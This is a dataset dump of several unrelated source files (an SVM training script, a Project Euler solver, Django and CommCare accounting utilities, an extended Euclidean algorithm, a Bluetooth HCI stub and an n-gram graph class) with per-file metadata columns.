X = data.drop(['index'],axis=1).iloc[:, :30].values
y = data.iloc[:,-1].values
kaggle_y = kaggle_data.iloc[:,-1].values  # labels assumed to be in the last column, mirroring new_data.csv
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.99)
kaggle_X_train, kaggle_X_test, kaggle_y_train, kaggle_y_test = train_test_split(kaggle_X, kaggle_y, test_size = 0.02)
svclassifier = SVC(kernel='poly',degree=5)
svclassifier.fit(kaggle_X_train, kaggle_y_train)
dump(svclassifier, 'pre_model.joblib')
y_pred = svclassifier.predict(X_test)
print(confusion_matrix(y_test,y_pred))
print(classification_report(y_test,y_pred))
# print("X=%s, Predicted=%s" % (test_2d, y_pred_test[0]))
# print(y_pred.shape)
# TESTING ZONE
X = [[-1,1,0,-1,-1,-1,1,0,-1,1,1,-1,0,0,-1,-1,-1,-1,0,1,0,0,0,-1,1,1,1,1,-1,-1]]
print("PREDICTION:",svclassifier.predict(X))
| import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from sklearn.model_selection import train_test_split
from sklearn.svm import SVC
from sklearn.metrics import classification_report, confusion_matrix
from mlxtend.plotting import plot_decision_regions
# from sklearn import datasets
from pandas.plotting import scatter_matrix
from joblib import dump, load
import collections
kaggle_data = pd.read_csv('data/kaggle.csv')
data = pd.read_csv('data/new_data.csv')
kaggle_X = kaggle_data.iloc[:, :30].values
X = data.drop(['index'],axis=1).iloc[:, :30].values
y = data.iloc[:,-1].values
kaggle_y = kaggle_data.iloc[:,-1].values  # labels assumed to be in the last column, mirroring new_data.csv
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.99)
kaggle_X_train, kaggle_X_test, kaggle_y_train, kaggle_y_test = train_test_split(kaggle_X, kaggle_y, test_size = 0.02)
svclassifier = SVC(kernel='poly',degree=5)
svclassifier.fit(kaggle_X_train, kaggle_y_train)
dump(svclassifier, 'pre_model.joblib')
y_pred = svclassifier.predict(X_test)
print(confusion_matrix(y_test,y_pred))
print(classification_report(y_test,y_pred))
# print("X=%s, Predicted=%s" % (test_2d, y_pred_test[0]))
# print(y_pred.shape)
# TESTING ZONE
X = [[-1,1,0,-1,-1,-1,1,0,-1,1,1,-1,0,0,-1,-1,-1,-1,0,1,0,0,0,-1,1,1,1,1,-1,-1]]
print("PREDICTION:",svclassifier.predict(X)) | en | 0.215857 | # from sklearn import datasets # print("X=%s, Predicted=%s" % (test_2d, y_pred_test[0])) # print(y_pred.shape) # TESTING ZONE | 2.818171 | 3 |
PE032.py | CaptainSora/Python-Project-Euler | 0 | 10328 | from itertools import count
from _pandigital_tools import is_pandigital
def pand_products():
"""
Returns the sum of all numbers n which have a factorization a * b = n such
that a, b, n are (cumulatively) 1 through 9 pandigital.
"""
total = set()
for a in range(2, 100):
for b in count(a):
if len(str(a) + str(b) + str(a * b)) > 9:
break
elif is_pandigital(a, b, a * b):
total.add(a * b)
return sum(total)
def solve(vol=0):
return pand_products()
| from itertools import count
from _pandigital_tools import is_pandigital
def pand_products():
"""
Returns the sum of all numbers n which have a factorization a * b = n such
that a, b, n are (cumulatively) 1 through 9 pandigital.
"""
total = set()
for a in range(2, 100):
for b in count(a):
if len(str(a) + str(b) + str(a * b)) > 9:
break
elif is_pandigital(a, b, a * b):
total.add(a * b)
return sum(total)
def solve(vol=0):
return pand_products()
| en | 0.940235 | Returns the sum of all numbers n which have a factorization a * b = n such that a, b, n are (cumulatively) 1 through 9 pandigital. | 3.675899 | 4 |
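The _pandigital_tools helper imported above is not shown in this record; a plausible stand-in consistent with the docstring's definition could look like this (an assumption, not the repository's actual code):
def is_pandigital(*nums):
    # True when the concatenated digits of all arguments use 1-9 exactly once
    digits = "".join(str(n) for n in nums)
    return len(digits) == 9 and set(digits) == set("123456789")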
v1/models.py | jdubansky/openstates.org | 1 | 10329 | from django.db import models
from openstates.data.models import Bill
class LegacyBillMapping(models.Model):
legacy_id = models.CharField(max_length=20, primary_key=True)
bill = models.ForeignKey(
Bill, related_name="legacy_mapping", on_delete=models.CASCADE
)
| from django.db import models
from openstates.data.models import Bill
class LegacyBillMapping(models.Model):
legacy_id = models.CharField(max_length=20, primary_key=True)
bill = models.ForeignKey(
Bill, related_name="legacy_mapping", on_delete=models.CASCADE
)
| none | 1 | 2.05028 | 2 |
|
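A hypothetical lookup through the mapping model above; the legacy id is invented and the snippet assumes openstates' Bill exposes an identifier field.
mapping = LegacyBillMapping.objects.get(legacy_id="AKB00000001")
print(mapping.bill.identifier)  # follows the ForeignKey to the Bill row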
corehq/apps/accounting/utils.py | satyaakam/commcare-hq | 0 | 10330 |
import datetime
import logging
from collections import defaultdict, namedtuple
from django.conf import settings
from django.template.loader import render_to_string
from django.urls import reverse
from django.utils.translation import ugettext_lazy as _
from django_prbac.models import Grant, Role, UserRole
from corehq.const import USER_DATE_FORMAT
from dimagi.utils.couch.database import iter_docs
from dimagi.utils.dates import add_months
from corehq import privileges
from corehq.apps.accounting.exceptions import (
AccountingError,
ProductPlanNotFoundError,
)
from corehq.apps.domain.models import Domain
from corehq.util.quickcache import quickcache
from corehq.util.view_utils import absolute_reverse
logger = logging.getLogger('accounting')
EXCHANGE_RATE_DECIMAL_PLACES = 9
def log_accounting_error(message, show_stack_trace=False):
logger.error("[BILLING] %s" % message, exc_info=show_stack_trace)
def log_accounting_info(message):
logger.info("[BILLING] %s" % message)
def months_from_date(reference_date, months_from_date):
year, month = add_months(reference_date.year, reference_date.month, months_from_date)
return datetime.date(year, month, 1)
def ensure_domain_instance(domain):
if not isinstance(domain, Domain):
domain = Domain.get_by_name(domain)
return domain
def fmt_feature_rate_dict(feature, feature_rate=None):
"""
This will be turned into a JSON representation of this Feature and its FeatureRate
"""
if feature_rate is None:
feature_rate = feature.get_rate()
return {
'name': feature.name,
'feature_type': feature.feature_type,
'feature_id': feature.id,
'rate_id': feature_rate.id,
'monthly_fee': str(feature_rate.monthly_fee),
'monthly_limit': feature_rate.monthly_limit,
'per_excess_fee': str(feature_rate.per_excess_fee),
}
def fmt_product_rate_dict(product_name, product_rate=None):
"""
This will be turned into a JSON representation of this SoftwareProductRate
"""
from corehq.apps.accounting.models import SoftwareProductRate
if product_rate is None:
try:
product_rate = SoftwareProductRate.objects.filter(
is_active=True,
name=product_name,
).latest('date_created')
except SoftwareProductRate.DoesNotExist:
product_rate = SoftwareProductRate.objects.create(name=product_name, is_active=True)
return {
'name': product_rate.name,
'rate_id': product_rate.id,
'monthly_fee': str(product_rate.monthly_fee),
}
def get_privileges(plan_version):
role = plan_version.role.get_cached_role()
return set([grant.to_role.slug for grant in role.memberships_granted.all()])
ChangeStatusResult = namedtuple('ChangeStatusResult', ['adjustment_reason', 'downgraded_privs', 'upgraded_privs'])
def get_change_status(from_plan_version, to_plan_version):
from_privs = (
get_privileges(from_plan_version)
if from_plan_version is not None
else set(privileges.MAX_PRIVILEGES)
)
to_privs = get_privileges(to_plan_version) if to_plan_version is not None else set()
downgraded_privs = from_privs.difference(to_privs)
upgraded_privs = to_privs
from corehq.apps.accounting.models import SubscriptionAdjustmentReason as Reason
if from_plan_version is None:
adjustment_reason = Reason.CREATE
else:
adjustment_reason = Reason.SWITCH
if len(downgraded_privs) == 0 and len(upgraded_privs) > 0:
adjustment_reason = Reason.UPGRADE
elif len(upgraded_privs) == 0 and len(downgraded_privs) > 0:
adjustment_reason = Reason.DOWNGRADE
return ChangeStatusResult(adjustment_reason, downgraded_privs, upgraded_privs)
def domain_has_privilege_cache_args(domain, privilege_slug, **assignment):
return [
domain.name if isinstance(domain, Domain) else domain,
privilege_slug
]
@quickcache(domain_has_privilege_cache_args, timeout=10)
def domain_has_privilege(domain, privilege_slug, **assignment):
from corehq.apps.accounting.models import Subscription
try:
plan_version = Subscription.get_subscribed_plan_by_domain(domain)
privilege = Role.get_privilege(privilege_slug, assignment)
if privilege is None:
return False
if plan_version.role.has_privilege(privilege):
return True
except ProductPlanNotFoundError:
return False
except AccountingError:
pass
return False
@quickcache(['domain_name'], timeout=15 * 60)
def domain_is_on_trial(domain_name):
from corehq.apps.accounting.models import Subscription
subscription = Subscription.get_active_subscription_by_domain(domain_name)
return subscription and subscription.is_trial
def is_active_subscription(date_start, date_end, today=None):
today = today or datetime.date.today()
return ((date_start is None or date_start <= today)
and (date_end is None or today < date_end))
def has_subscription_already_ended(subscription):
return (subscription.date_end is not None
and subscription.date_end <= datetime.date.today())
def get_money_str(amount):
if amount is not None:
if amount < 0:
fmt = "-$%0.2f"
amount = abs(amount)
else:
fmt = "$%0.2f"
return fmt % amount
return ""
def get_address_from_invoice(invoice):
from corehq.apps.accounting.invoice_pdf import Address
from corehq.apps.accounting.models import BillingContactInfo
try:
contact_info = BillingContactInfo.objects.get(
account=invoice.account,
)
return Address(
name=(
"%s %s" %
(contact_info.first_name
if contact_info.first_name is not None else "",
contact_info.last_name
if contact_info.last_name is not None else "")
),
company_name=contact_info.company_name,
first_line=contact_info.first_line,
second_line=contact_info.second_line,
city=contact_info.city,
region=contact_info.state_province_region,
postal_code=contact_info.postal_code,
country=contact_info.country,
)
except BillingContactInfo.DoesNotExist:
return Address()
def get_dimagi_from_email():
return ("Dimagi CommCare Accounts <%(email)s>" % {
'email': settings.INVOICING_CONTACT_EMAIL,
})
def quantize_accounting_decimal(decimal_value):
return "%0.2f" % decimal_value
def fmt_dollar_amount(decimal_value):
return _("USD %s") % quantize_accounting_decimal(decimal_value)
def get_customer_cards(username, domain):
from corehq.apps.accounting.models import (
StripePaymentMethod, PaymentMethodType,
)
import stripe
try:
payment_method = StripePaymentMethod.objects.get(
web_user=username,
method_type=PaymentMethodType.STRIPE
)
stripe_customer = payment_method.customer
return dict(stripe_customer.cards)
except StripePaymentMethod.DoesNotExist:
pass
except stripe.error.AuthenticationError:
if not settings.STRIPE_PRIVATE_KEY:
log_accounting_info("Private key is not defined in settings")
else:
raise
return None
def is_accounting_admin(user):
accounting_privilege = Role.get_privilege(privileges.ACCOUNTING_ADMIN)
if accounting_privilege is None:
return False
try:
return user.prbac_role.has_privilege(accounting_privilege)
except (AttributeError, UserRole.DoesNotExist):
return False
def make_anchor_tag(href, name, attrs=None):
context = {
'href': href,
'name': name,
'attrs': attrs or {},
}
return render_to_string('accounting/partials/anchor_tag.html', context)
def get_default_domain_url(domain):
from corehq.apps.domain.views.settings import DefaultProjectSettingsView
return absolute_reverse(
DefaultProjectSettingsView.urlname,
args=[domain],
)
def ensure_grants(grants_to_privs, dry_run=False, verbose=False, roles_by_slug=None):
"""
Adds a parameterless grant between grantee and priv, looked up by slug.
:param grants_to_privs: An iterable of two-tuples:
`(grantee_slug, priv_slugs)`. Will only be iterated once.
"""
dry_run_tag = "[DRY RUN] " if dry_run else ""
if roles_by_slug is None:
roles_by_slug = {role.slug: role for role in Role.objects.all()}
granted = defaultdict(set)
for grant in Grant.objects.select_related('from_role', 'to_role').all():
granted[grant.from_role.slug].add(grant.to_role.slug)
grants_to_create = []
for grantee_slug, priv_slugs in grants_to_privs:
if grantee_slug not in roles_by_slug:
logger.info('grantee %s does not exist.', grantee_slug)
continue
for priv_slug in priv_slugs:
if priv_slug not in roles_by_slug:
logger.info('privilege %s does not exist.', priv_slug)
continue
if priv_slug in granted[grantee_slug]:
if verbose or dry_run:
logger.info('%sPrivilege already granted: %s => %s',
dry_run_tag, grantee_slug, priv_slug)
else:
granted[grantee_slug].add(priv_slug)
if verbose or dry_run:
logger.info('%sGranting privilege: %s => %s',
dry_run_tag, grantee_slug, priv_slug)
if not dry_run:
grants_to_create.append(Grant(
from_role=roles_by_slug[grantee_slug],
to_role=roles_by_slug[priv_slug]
))
if grants_to_create:
Role.get_cache().clear()
Grant.objects.bulk_create(grants_to_create)
def log_removed_grants(priv_slugs, dry_run=False):
grants = Grant.objects.filter(to_role__slug__in=list(priv_slugs))
if grants:
logger.info("%sRemoving privileges: %s",
("[DRY RUN] " if dry_run else ""),
", ".join(g.to_role.slug for g in grants),
)
def get_account_name_from_default_name(default_name):
from corehq.apps.accounting.models import BillingAccount
if not BillingAccount.objects.filter(name=default_name).exists():
return default_name
else:
matching_regex_count = BillingAccount.objects.filter(
name__iregex=r'^%s \(\d+\)$' % default_name,
).count()
return '%s (%d)' % (
default_name,
matching_regex_count + 1
)
def cancel_future_subscriptions(domain_name, from_date, web_user):
from corehq.apps.accounting.models import (
Subscription,
SubscriptionAdjustment,
SubscriptionAdjustmentReason,
)
for later_subscription in Subscription.visible_objects.filter(
subscriber__domain=domain_name,
date_start__gt=from_date,
).order_by('date_start').all():
later_subscription.date_end = later_subscription.date_start
later_subscription.save()
SubscriptionAdjustment.record_adjustment(
later_subscription,
reason=SubscriptionAdjustmentReason.CANCEL,
web_user=web_user,
note="Cancelled due to changing subscription",
)
def pause_current_subscription(domain_name, web_user, current_subscription):
from corehq.apps.accounting.models import (
Subscription,
DefaultProductPlan,
SoftwarePlanEdition,
SubscriptionAdjustmentMethod,
SubscriptionType,
ProBonoStatus,
FundingSource,
)
cancel_future_subscriptions(domain_name, datetime.date.today(), web_user)
paused_plan_version = DefaultProductPlan.get_default_plan_version(
SoftwarePlanEdition.PAUSED
)
if current_subscription.is_below_minimum_subscription:
current_subscription.update_subscription(
date_start=current_subscription.date_start,
date_end=current_subscription.date_start + datetime.timedelta(days=30)
)
return Subscription.new_domain_subscription(
account=current_subscription.account,
domain=domain_name,
plan_version=paused_plan_version,
date_start=current_subscription.date_start + datetime.timedelta(days=30),
web_user=web_user,
adjustment_method=SubscriptionAdjustmentMethod.USER,
service_type=SubscriptionType.PRODUCT,
pro_bono_status=ProBonoStatus.NO,
funding_source=FundingSource.CLIENT,
do_not_invoice=True,
no_invoice_reason='Paused plan',
)
else:
return current_subscription.change_plan(
paused_plan_version,
web_user=web_user,
adjustment_method=SubscriptionAdjustmentMethod.USER,
service_type=SubscriptionType.PRODUCT,
pro_bono_status=ProBonoStatus.NO,
do_not_invoice=True,
no_invoice_reason='Paused plan',
)
def is_downgrade(current_edition, next_edition):
from corehq.apps.accounting.models import SoftwarePlanEdition
plans = SoftwarePlanEdition.SELF_SERVICE_ORDER + [SoftwarePlanEdition.ENTERPRISE]
return plans.index(current_edition) > plans.index(next_edition)
def clear_plan_version_cache():
from corehq.apps.accounting.models import SoftwarePlan
for software_plan in SoftwarePlan.objects.all():
SoftwarePlan.get_version.clear(software_plan)
def get_paused_plan_context(request, domain):
from corehq.apps.accounting.models import Subscription
from corehq.apps.domain.views import SelectPlanView
current_sub = Subscription.get_active_subscription_by_domain(domain)
if (not current_sub
or not current_sub.plan_version.is_paused
or not current_sub.previous_subscription):
return {}
previous_edition = (current_sub.previous_subscription.plan_version.plan.edition
if current_sub.previous_subscription else "")
return {
'is_paused': True,
'previous_edition': previous_edition,
'paused_date': current_sub.date_start.strftime(USER_DATE_FORMAT),
'change_plan_url': reverse(SelectPlanView.urlname, args=[domain]),
'can_edit_billing_info': request.couch_user.is_domain_admin(domain),
}
import datetime
import logging
from collections import defaultdict, namedtuple
from django.conf import settings
from django.template.loader import render_to_string
from django.urls import reverse
from django.utils.translation import ugettext_lazy as _
from django_prbac.models import Grant, Role, UserRole
from corehq.const import USER_DATE_FORMAT
from dimagi.utils.couch.database import iter_docs
from dimagi.utils.dates import add_months
from corehq import privileges
from corehq.apps.accounting.exceptions import (
AccountingError,
ProductPlanNotFoundError,
)
from corehq.apps.domain.models import Domain
from corehq.util.quickcache import quickcache
from corehq.util.view_utils import absolute_reverse
logger = logging.getLogger('accounting')
EXCHANGE_RATE_DECIMAL_PLACES = 9
def log_accounting_error(message, show_stack_trace=False):
logger.error("[BILLING] %s" % message, exc_info=show_stack_trace)
def log_accounting_info(message):
logger.info("[BILLING] %s" % message)
def months_from_date(reference_date, months_from_date):
year, month = add_months(reference_date.year, reference_date.month, months_from_date)
return datetime.date(year, month, 1)
def ensure_domain_instance(domain):
if not isinstance(domain, Domain):
domain = Domain.get_by_name(domain)
return domain
def fmt_feature_rate_dict(feature, feature_rate=None):
"""
This will be turned into a JSON representation of this Feature and its FeatureRate
"""
if feature_rate is None:
feature_rate = feature.get_rate()
return {
'name': feature.name,
'feature_type': feature.feature_type,
'feature_id': feature.id,
'rate_id': feature_rate.id,
'monthly_fee': str(feature_rate.monthly_fee),
'monthly_limit': feature_rate.monthly_limit,
'per_excess_fee': str(feature_rate.per_excess_fee),
}
def fmt_product_rate_dict(product_name, product_rate=None):
"""
This will be turned into a JSON representation of this SoftwareProductRate
"""
from corehq.apps.accounting.models import SoftwareProductRate
if product_rate is None:
try:
product_rate = SoftwareProductRate.objects.filter(
is_active=True,
name=product_name,
).latest('date_created')
except SoftwareProductRate.DoesNotExist:
product_rate = SoftwareProductRate.objects.create(name=product_name, is_active=True)
return {
'name': product_rate.name,
'rate_id': product_rate.id,
'monthly_fee': str(product_rate.monthly_fee),
}
def get_privileges(plan_version):
role = plan_version.role.get_cached_role()
return set([grant.to_role.slug for grant in role.memberships_granted.all()])
ChangeStatusResult = namedtuple('ChangeStatusResult', ['adjustment_reason', 'downgraded_privs', 'upgraded_privs'])
def get_change_status(from_plan_version, to_plan_version):
from_privs = (
get_privileges(from_plan_version)
if from_plan_version is not None
else set(privileges.MAX_PRIVILEGES)
)
to_privs = get_privileges(to_plan_version) if to_plan_version is not None else set()
downgraded_privs = from_privs.difference(to_privs)
upgraded_privs = to_privs
from corehq.apps.accounting.models import SubscriptionAdjustmentReason as Reason
if from_plan_version is None:
adjustment_reason = Reason.CREATE
else:
adjustment_reason = Reason.SWITCH
if len(downgraded_privs) == 0 and len(upgraded_privs) > 0:
adjustment_reason = Reason.UPGRADE
elif len(upgraded_privs) == 0 and len(downgraded_privs) > 0:
adjustment_reason = Reason.DOWNGRADE
return ChangeStatusResult(adjustment_reason, downgraded_privs, upgraded_privs)
def domain_has_privilege_cache_args(domain, privilege_slug, **assignment):
return [
domain.name if isinstance(domain, Domain) else domain,
privilege_slug
]
@quickcache(domain_has_privilege_cache_args, timeout=10)
def domain_has_privilege(domain, privilege_slug, **assignment):
from corehq.apps.accounting.models import Subscription
try:
plan_version = Subscription.get_subscribed_plan_by_domain(domain)
privilege = Role.get_privilege(privilege_slug, assignment)
if privilege is None:
return False
if plan_version.role.has_privilege(privilege):
return True
except ProductPlanNotFoundError:
return False
except AccountingError:
pass
return False
@quickcache(['domain_name'], timeout=15 * 60)
def domain_is_on_trial(domain_name):
from corehq.apps.accounting.models import Subscription
subscription = Subscription.get_active_subscription_by_domain(domain_name)
return subscription and subscription.is_trial
def is_active_subscription(date_start, date_end, today=None):
today = today or datetime.date.today()
return ((date_start is None or date_start <= today)
and (date_end is None or today < date_end))
def has_subscription_already_ended(subscription):
return (subscription.date_end is not None
and subscription.date_end <= datetime.date.today())
def get_money_str(amount):
if amount is not None:
if amount < 0:
fmt = "-$%0.2f"
amount = abs(amount)
else:
fmt = "$%0.2f"
return fmt % amount
return ""
def get_address_from_invoice(invoice):
from corehq.apps.accounting.invoice_pdf import Address
from corehq.apps.accounting.models import BillingContactInfo
try:
contact_info = BillingContactInfo.objects.get(
account=invoice.account,
)
return Address(
name=(
"%s %s" %
(contact_info.first_name
if contact_info.first_name is not None else "",
contact_info.last_name
if contact_info.last_name is not None else "")
),
company_name=contact_info.company_name,
first_line=contact_info.first_line,
second_line=contact_info.second_line,
city=contact_info.city,
region=contact_info.state_province_region,
postal_code=contact_info.postal_code,
country=contact_info.country,
)
except BillingContactInfo.DoesNotExist:
return Address()
def get_dimagi_from_email():
return ("Dimagi CommCare Accounts <%(email)s>" % {
'email': settings.INVOICING_CONTACT_EMAIL,
})
def quantize_accounting_decimal(decimal_value):
return "%0.2f" % decimal_value
def fmt_dollar_amount(decimal_value):
return _("USD %s") % quantize_accounting_decimal(decimal_value)
def get_customer_cards(username, domain):
from corehq.apps.accounting.models import (
StripePaymentMethod, PaymentMethodType,
)
import stripe
try:
payment_method = StripePaymentMethod.objects.get(
web_user=username,
method_type=PaymentMethodType.STRIPE
)
stripe_customer = payment_method.customer
return dict(stripe_customer.cards)
except StripePaymentMethod.DoesNotExist:
pass
except stripe.error.AuthenticationError:
if not settings.STRIPE_PRIVATE_KEY:
log_accounting_info("Private key is not defined in settings")
else:
raise
return None
def is_accounting_admin(user):
accounting_privilege = Role.get_privilege(privileges.ACCOUNTING_ADMIN)
if accounting_privilege is None:
return False
try:
return user.prbac_role.has_privilege(accounting_privilege)
except (AttributeError, UserRole.DoesNotExist):
return False
def make_anchor_tag(href, name, attrs=None):
context = {
'href': href,
'name': name,
'attrs': attrs or {},
}
return render_to_string('accounting/partials/anchor_tag.html', context)
def get_default_domain_url(domain):
from corehq.apps.domain.views.settings import DefaultProjectSettingsView
return absolute_reverse(
DefaultProjectSettingsView.urlname,
args=[domain],
)
def ensure_grants(grants_to_privs, dry_run=False, verbose=False, roles_by_slug=None):
"""
Adds a parameterless grant between grantee and priv, looked up by slug.
:param grants_to_privs: An iterable of two-tuples:
`(grantee_slug, priv_slugs)`. Will only be iterated once.
"""
dry_run_tag = "[DRY RUN] " if dry_run else ""
if roles_by_slug is None:
roles_by_slug = {role.slug: role for role in Role.objects.all()}
granted = defaultdict(set)
for grant in Grant.objects.select_related('from_role', 'to_role').all():
granted[grant.from_role.slug].add(grant.to_role.slug)
grants_to_create = []
for grantee_slug, priv_slugs in grants_to_privs:
if grantee_slug not in roles_by_slug:
logger.info('grantee %s does not exist.', grantee_slug)
continue
for priv_slug in priv_slugs:
if priv_slug not in roles_by_slug:
logger.info('privilege %s does not exist.', priv_slug)
continue
if priv_slug in granted[grantee_slug]:
if verbose or dry_run:
logger.info('%sPrivilege already granted: %s => %s',
dry_run_tag, grantee_slug, priv_slug)
else:
granted[grantee_slug].add(priv_slug)
if verbose or dry_run:
logger.info('%sGranting privilege: %s => %s',
dry_run_tag, grantee_slug, priv_slug)
if not dry_run:
grants_to_create.append(Grant(
from_role=roles_by_slug[grantee_slug],
to_role=roles_by_slug[priv_slug]
))
if grants_to_create:
Role.get_cache().clear()
Grant.objects.bulk_create(grants_to_create)
def log_removed_grants(priv_slugs, dry_run=False):
grants = Grant.objects.filter(to_role__slug__in=list(priv_slugs))
if grants:
logger.info("%sRemoving privileges: %s",
("[DRY RUN] " if dry_run else ""),
", ".join(g.to_role.slug for g in grants),
)
def get_account_name_from_default_name(default_name):
from corehq.apps.accounting.models import BillingAccount
if not BillingAccount.objects.filter(name=default_name).exists():
return default_name
else:
matching_regex_count = BillingAccount.objects.filter(
name__iregex=r'^%s \(\d+\)$' % default_name,
).count()
return '%s (%d)' % (
default_name,
matching_regex_count + 1
)
def cancel_future_subscriptions(domain_name, from_date, web_user):
from corehq.apps.accounting.models import (
Subscription,
SubscriptionAdjustment,
SubscriptionAdjustmentReason,
)
for later_subscription in Subscription.visible_objects.filter(
subscriber__domain=domain_name,
date_start__gt=from_date,
).order_by('date_start').all():
later_subscription.date_end = later_subscription.date_start
later_subscription.save()
SubscriptionAdjustment.record_adjustment(
later_subscription,
reason=SubscriptionAdjustmentReason.CANCEL,
web_user=web_user,
note="Cancelled due to changing subscription",
)
def pause_current_subscription(domain_name, web_user, current_subscription):
from corehq.apps.accounting.models import (
Subscription,
DefaultProductPlan,
SoftwarePlanEdition,
SubscriptionAdjustmentMethod,
SubscriptionType,
ProBonoStatus,
FundingSource,
)
cancel_future_subscriptions(domain_name, datetime.date.today(), web_user)
paused_plan_version = DefaultProductPlan.get_default_plan_version(
SoftwarePlanEdition.PAUSED
)
if current_subscription.is_below_minimum_subscription:
current_subscription.update_subscription(
date_start=current_subscription.date_start,
date_end=current_subscription.date_start + datetime.timedelta(days=30)
)
return Subscription.new_domain_subscription(
account=current_subscription.account,
domain=domain_name,
plan_version=paused_plan_version,
date_start=current_subscription.date_start + datetime.timedelta(days=30),
web_user=web_user,
adjustment_method=SubscriptionAdjustmentMethod.USER,
service_type=SubscriptionType.PRODUCT,
pro_bono_status=ProBonoStatus.NO,
funding_source=FundingSource.CLIENT,
do_not_invoice=True,
no_invoice_reason='Paused plan',
)
else:
return current_subscription.change_plan(
paused_plan_version,
web_user=web_user,
adjustment_method=SubscriptionAdjustmentMethod.USER,
service_type=SubscriptionType.PRODUCT,
pro_bono_status=ProBonoStatus.NO,
do_not_invoice=True,
no_invoice_reason='Paused plan',
)
def is_downgrade(current_edition, next_edition):
from corehq.apps.accounting.models import SoftwarePlanEdition
plans = SoftwarePlanEdition.SELF_SERVICE_ORDER + [SoftwarePlanEdition.ENTERPRISE]
return plans.index(current_edition) > plans.index(next_edition)
def clear_plan_version_cache():
from corehq.apps.accounting.models import SoftwarePlan
for software_plan in SoftwarePlan.objects.all():
SoftwarePlan.get_version.clear(software_plan)
def get_paused_plan_context(request, domain):
from corehq.apps.accounting.models import Subscription
from corehq.apps.domain.views import SelectPlanView
current_sub = Subscription.get_active_subscription_by_domain(domain)
if (not current_sub
or not current_sub.plan_version.is_paused
or not current_sub.previous_subscription):
return {}
previous_edition = (current_sub.previous_subscription.plan_version.plan.edition
if current_sub.previous_subscription else "")
return {
'is_paused': True,
'previous_edition': previous_edition,
'paused_date': current_sub.date_start.strftime(USER_DATE_FORMAT),
'change_plan_url': reverse(SelectPlanView.urlname, args=[domain]),
'can_edit_billing_info': request.couch_user.is_domain_admin(domain),
}
| en | 0.915255 | This will be turned into a JSON representation of this Feature and its FeatureRate This will be turned into a JSON representation of this SoftwareProductRate Adds a parameterless grant between grantee and priv, looked up by slug. :param grants_to_privs: An iterable of two-tuples: `(grantee_slug, priv_slugs)`. Will only be iterated once. | 1.984207 | 2 |
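Two of the pure helpers in the record above can be sanity-checked in isolation. The first assertion assumes dimagi's add_months advances by whole calendar months; the expected strings follow directly from the format codes in the source.
import datetime
assert months_from_date(datetime.date(2020, 11, 15), 3) == datetime.date(2021, 2, 1)
assert get_money_str(-5) == "-$5.00"
assert quantize_accounting_decimal(3.14159) == "3.14"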
RSA/Algorithm/EEA.py | Pumpkin-NN/Cryptography | 0 | 10331 |
def extended_euclidean_algorithm(a, b):
    # Iterative extended Euclidean algorithm
    # Invariants: old_r = a*old_s + b*old_t and r = a*s + b*t,
    # so when the loop ends old_r == gcd(a, b) and (old_s, old_t)
    # are the Bezout coefficients
    old_r, r = a, b
    old_s, s = 1, 0
    old_t, t = 0, 1
    while r > 0:
        q = old_r // r
        old_r, r = r, old_r - q * r
        old_s, s = s, old_s - q * s
        old_t, t = t, old_t - q * t
    # Return the coefficient t, so a*old_s + b*old_t == gcd(a, b)
    return old_t
def extended_euclidean_algorithm(a, b):
    # Iterative extended Euclidean algorithm
    # Invariants: old_r = a*old_s + b*old_t and r = a*s + b*t,
    # so when the loop ends old_r == gcd(a, b) and (old_s, old_t)
    # are the Bezout coefficients
    old_r, r = a, b
    old_s, s = 1, 0
    old_t, t = 0, 1
    while r > 0:
        q = old_r // r
        old_r, r = r, old_r - q * r
        old_s, s = s, old_s - q * s
        old_t, t = t, old_t - q * t
    # Return the coefficient t, so a*old_s + b*old_t == gcd(a, b)
    return old_t
| en | 0.764078 | # Iterative extended Euclidean algorithm # Invariants: old_r = a*old_s + b*old_t and r = a*s + b*t, # so when the loop ends old_r == gcd(a, b) and (old_s, old_t) # are the Bezout coefficients # Return the coefficient t, so a*old_s + b*old_t == gcd(a, b) | 3.382838 | 3 |
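A quick check of the Bezout identity for the routine above: since a*old_s + b*old_t == gcd(a, b), the returned t must satisfy (gcd(a, b) - b*t) % a == 0 for any input pair.
from math import gcd
for a, b in [(240, 46), (65537, 3120)]:
    t = extended_euclidean_algorithm(a, b)
    assert (gcd(a, b) - b * t) % a == 0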
hci/command/commands/le_apcf_commands/apcf_service_data.py | cc4728/python-hci | 3 | 10332 | from ..le_apcf_command_pkt import LE_APCF_Command
from struct import pack, unpack
from enum import IntEnum
"""
This part is based on the spec <<Android BT HCI Requirement for BLE feature>> v0.52
Advertisement Package Content filter
"""
class APCF_Service_Data(LE_APCF_Command):
def __init__(self):
# TODO generate cmd
super().__init__()
def __str__(self):
return super().__str__()+''.join(['{}']).format("") | from ..le_apcf_command_pkt import LE_APCF_Command
from struct import pack, unpack
from enum import IntEnum
"""
This part is based on the spec <<Android BT HCI Requirement for BLE feature>> v0.52
Advertisement Package Content filter
"""
class APCF_Service_Data(LE_APCF_Command):
def __init__(self):
# TODO generate cmd
super().__init__()
def __str__(self):
return super().__str__()+''.join(['{}']).format("") | en | 0.335834 | This part is based on the spec <<Android BT HCI Requirement for BLE feature>> v0.52 Advertisement Package Content filter # TODO generate cmd | 2.215252 | 2 |
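The command body above is still a TODO; if it were filled in, the struct import already present suggests a packed payload along these lines. This is purely speculative, the real subcommand id and field layout come from the Android HCI spec, not from this file.
# service_data and mask would be byte strings of equal length; the ids and
# framing below are placeholders, not real spec values
# payload = pack('<BBB', APCF_SUBCMD, filter_index, len(service_data)) \
#           + service_data + mask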
source/documentModel/representations/DocumentNGramSymWinGraph.py | Vyvy-vi/Ngram-Graphs | 178 | 10333 |
"""
DocumentNGramSymWinGraph.py
Created on May 23, 2017, 4:56 PM
"""
import networkx as nx
import pygraphviz as pgv
import matplotlib.pyplot as plt
from networkx.drawing.nx_agraph import graphviz_layout
from DocumentNGramGraph import DocumentNGramGraph
class DocumentNGramSymWinGraph(DocumentNGramGraph):
# an extension of DocumentNGramGraph
# for symmetric windowing
def buildGraph(self,verbose = False, d=[]):
# set Data @class_variable
self.setData(d)
Data = self._Data
# build ngram
ng = self.build_ngram()
s = len(ng)
# calculate window
win = self._Dwin//2
# initialize graph
self._Graph = nx.Graph()
if(s>=2 and win>=1):
# max possible window size (bounded by win)
o = min(win,s)+1
window = ng[1:o]
i = o
# first build the full window
for gram in ng[0:s-1]:
for w in window:
self.addEdgeInc(gram,w)
window.pop(0)
# if window's edge has reached
# it's the limit of ng stop
# appending
if i<s:
